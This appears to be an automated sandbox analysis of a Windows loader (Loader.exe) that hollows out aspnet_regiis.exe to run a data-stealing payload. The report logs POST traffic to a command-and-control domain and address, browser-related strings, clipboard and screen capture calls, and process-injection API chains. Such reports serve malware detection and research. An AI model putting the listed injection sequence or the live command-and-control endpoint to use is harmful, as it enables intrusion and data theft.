Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1142 | Host: mafnufacut.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 121 | Host: mafnufacut.cyou
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mafnufacut.cyou
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mafnufacut.cyou
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2224998411.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168775207.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168731170.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2214118301.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213943534.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168486617.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198964863.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2196049342.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168815356.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 
00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213899457.0000000005AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/2U
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/A
              Source: aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/The
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/api
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/apiZ
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/apiu
              Source: aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/gra
              Source: aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/h
              Source: aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/nkkpib0
              Source: aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/p
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/pi
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/piE
              Source: aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/r
              Source: aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/t7c5
              Source: aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou:443/api
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: aspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: aspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C5210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_033C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C59B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

System Summary

Source: Loader.exe, -Module-.cs | Large array initialization: _202B_200E_202E_206B_202D_206B_202B_206C_206A_202D_206B_206D_206F_206B_206A_206C_202B_206B_202A_206A_206D_200D_206C_206F_206E_200C_200E_202A_200B_202B_200D_206D_206B_206A_206C_200E_206C_200C_206C_202E_202E: array initializer size 62208
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F38A0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F3120 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F38A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F3120
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F11B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F7650
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F2760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5030D5
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E514670
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E515660
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E548630
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E50B6D5
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E512740
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E52BF40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E52AF06
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E50B728
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E51FFD8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5367E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E54C780
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E51EFBF
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E543FA0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E54CC50
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E513C45
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E50B400
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E51EC2A
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E50DCE0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E50F48B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E543D40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E511D60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E54ED20
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E52E5E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E521210
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E534AD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E52CAA0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E517B60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E511360
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E514B30
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E51B3EB
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E51439C
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E53F380
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E54C380
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E53F060
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E549020
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5290DE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5190C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5180B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E516170
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E529910
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E5151D0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E53D9B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA10B8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA41FC
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA59A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA6178
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3BD2
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA1540
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA2500
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA08C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA4011
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA100D
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA5990
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3910
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3902
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA4259
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3C8F
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3C42
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3C6D
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA2DC8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA2DB9
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3D63
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3E82
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA4FD8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA4FE8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3FED
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E546B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BEB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033CA2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A011A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033CA97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B6800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B509D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A00C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D4620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BA6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033AD5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03398340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B1B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A4BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D33B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D2380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BC3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A5BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033CE230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B0A24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BAA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033AE298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033912D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D32C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D4920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03397960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C9940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C1980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B41E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B91E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C31DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D31D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A482A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03391000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D2850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B9494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D1720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B8F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03396F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03399FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03394FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03399F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B6F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C4F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D1F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BB7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BB7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033A6E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BBE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B2E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BD642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B26A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C86FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033AF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B9D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339BD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C35B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_03398DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033B55A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C2D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0339ADD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033CEC20
